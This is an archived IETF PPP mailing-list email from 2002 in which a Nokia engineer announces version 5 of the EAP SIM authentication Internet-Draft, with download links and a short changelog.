Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 6E75291335
	for <ietf-ppp@trapdoor.merit.edu>; Fri, 28 Jun 2002 08:39:37 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 57DC15DED8; Fri, 28 Jun 2002 08:39:37 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from mgw-x2.nokia.com (mgw-x2.nokia.com [131.228.20.22])
	by segue.merit.edu (Postfix) with ESMTP id AFD035DED7
	for <ietf-ppp@merit.edu>; Fri, 28 Jun 2002 08:39:36 -0400 (EDT)
Received: from esvir02nok.ntc.nokia.com (esvir02nokt.ntc.nokia.com [172.21.143.34])
	by mgw-x2.nokia.com (Switch-2.2.1/Switch-2.2.0) with ESMTP id g5SCe4i01414
	for <ietf-ppp@merit.edu>; Fri, 28 Jun 2002 15:40:04 +0300 (EET DST)
Received: from esebh001.NOE.Nokia.com (unverified) by esvir02nok.ntc.nokia.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id <T5bc3c959a5ac158f22076@esvir02nok.ntc.nokia.com>;
 Fri, 28 Jun 2002 15:39:36 +0300
Received: from esebe008.NOE.Nokia.com ([172.21.138.48]) by esebh001.NOE.Nokia.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Fri, 28 Jun 2002 15:39:35 +0300
Received: from trebe003.NOE.Nokia.com ([172.22.232.175]) by esebe008.NOE.Nokia.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Fri, 28 Jun 2002 15:39:35 +0300
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: EAP SIM version 5
Date: Fri, 28 Jun 2002 15:39:34 +0300
Message-ID: <DED1F2C6CE07FA498D7AD0CCAC03401B015D0FC1@trebe003.NOE.Nokia.com>
Thread-Topic: EAP SIM version 4
Thread-Index: AcINP10iWF9AVySAQdOqkFudlVSLqQRYPz1g
From: <henry.haverinen@nokia.com>
To: <eap@frascone.com>
Cc: <ietf-ppp@merit.edu>
X-OriginalArrivalTime: 28 Jun 2002 12:39:35.0299 (UTC) FILETIME=[DBEABD30:01C21EA0]
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id IAA23383


Hi folks,

EAP SIM version 5 should be shortly available in
the I-D directories. It is also available at

http://www.cs.tut.fi/~haverinh/draft-haverinen-pppext-eap-sim-05.txt

The changes are visible in the pdf file available at

http://www.cs.tut.fi/~haverinh/eap-sim-05-changes.pdf

Changes to version 04:
- updated reference to NIST FIPS 182-2
- independence of EAP-Response/Identity
- improved IANA considerations
- editorial changes

> Changes to version 03:
> - all comments I have received since February are addressed.
>   Most significantly the draft now uses 128-bit MAC codes (AT_MAC and
>   AT_MAC_SRES) and integrity keys (K_int), and there is a new 
> PRF based on 
>   NIST FIPS Publication 186
> - zero configuration support

Best regards,
Henry


